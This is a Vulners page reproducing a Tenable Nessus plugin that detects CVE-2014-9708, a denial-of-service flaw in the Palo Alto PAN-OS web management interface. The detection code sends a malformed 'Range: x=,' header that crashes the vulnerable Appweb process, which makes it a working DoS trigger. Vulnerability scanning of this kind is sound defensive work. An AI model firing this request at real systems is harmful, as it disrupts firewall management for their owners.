Lucene search
K

Palo Alto Networks PAN-OS Management Interface Remote DoS (PAN-SA-2016-0027)

🗓️ 05 Jan 2017 00:00:00Reported by TenableType 
nessus
 nessus
🔗 www.tenable.com👁 70 Views

Palo Alto Networks PAN-OS Management Interface Remote DoS (PAN-SA-2016-0027) NULL Pointer Dereference Flaw

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNVD
Embedthis Software Appweb Denial of Service Vulnerability
1 Apr 201500:00
cnvd
CVE
CVE-2014-9708
31 Mar 201500:00
cve
Cvelist
CVE-2014-9708
31 Mar 201500:00
cvelist
EUVD
EUVD-2014-9515
7 Oct 202500:30
euvd
NVD
CVE-2014-9708
31 Mar 201514:59
nvd
OpenVAS
Palo Alto PAN-OS DoS Vulnerability (PAN-SA-2016-0027)
6 Jan 201700:00
openvas
OpenVAS
Embedthis Appweb Web Server Remote Denial of Service Vulnerability
1 Apr 201500:00
openvas
Oracle
Oracle Critical Patch Update - July 2016
19 Jul 201600:00
oracle
Palo Alto Networks
Web interface denial of service
11 Oct 201619:00
paloalto
Palo Alto Networks
Web interface denial of service
11 Oct 201619:00
paloalto
Rows per page
#
# (C) Tenable Network Security, Inc.
#

include('compat.inc');

if (description)
{
  script_id(96314);
  script_version("1.5");
  script_set_attribute(attribute:"plugin_modification_date", value:"2026/01/06");

  script_cve_id("CVE-2014-9708");
  script_bugtraq_id(73407);

  script_name(english:"Palo Alto Networks PAN-OS Management Interface Remote DoS (PAN-SA-2016-0027)");

  script_set_attribute(attribute:"synopsis", value:
"The remote host is affected by a denial of service vulnerability.");
  script_set_attribute(attribute:"description", value:
"The Palo Alto Networks PAN-OS running on the remote host is affected
by a NULL pointer dereference flaw in the web management interface,
specifically in the parseRange() function within file rx.c, when
handling HTTP requests involving a Range header with an empty value.
An unauthenticated, remote attacker can exploit this, via a specially
crafted request, to cause the Appweb process for the management
interface to terminate, resulting in a denial of service condition.

Note that PAN-OS is reportedly affected by other vulnerabilities as
well; however, Nessus has not tested for these.");
  script_set_attribute(attribute:"see_also", value:"https://securityadvisories.paloaltonetworks.com/Home/Detail/60");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Palo Alto Networks PAN-OS version 5.0.20 / 5.1.13 /
6.0.15 / 6.1.15 / 7.0.11 / 7.1.6 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2014-9708");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2016/10/31");
  script_set_attribute(attribute:"patch_publication_date", value:"2016/10/31");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/01/05");

  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:paloaltonetworks:pan-os");
  script_end_attributes();

  script_category(ACT_DENIAL);
  script_family(english:"Denial of Service");

  script_copyright(english:"This script is Copyright (C) 2017-2026 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("palo_alto_webui_detect.nbin");
  script_require_keys("www/palo_alto_panos", "Settings/ParanoidReport");
  script_require_ports("Services/www", 443);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

# Use lack of response to flag vulnerability is not so reliable
if (report_paranoia < 2) audit(AUDIT_PARANOID);

# Make sure PAN-OS is detected
get_kb_item_or_exit("www/palo_alto_panos");

port = get_http_port(default:443, embedded:TRUE);

# Skip non-https port
if(get_port_transport(port) == ENCAPS_IP)
{
  exit(0, "Skip testing non-https port " + port + ".");  
}

res = http_send_recv3(
  method:"GET",
  item: '/',
  port:port,
  add_headers: make_array('Range', 'x=,'),
  exit_on_fail: FALSE
);

req = http_last_sent_request();

# Patched
if(res[0] =~ "^HTTP/[0-9.]+ 416") 
{
  audit(AUDIT_LISTEN_NOT_VULN, "web server", port);
}
# Vulnerable
# appweb terminates and restarts
else if(! res                           # seen in 6.1.x
     || res[0] =~ "^HTTP/[0-9.]+ 502")  # seen in 7.x
{

  security_report_v4(
    port       : port,
    severity   : SECURITY_WARNING,
    request    : make_list(req),
    generic    : TRUE
  );
}
# Unexpected response status
else
{
  audit(AUDIT_RESP_BAD, port, 'an HTTP request. Response status:\n' + res[0]);
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation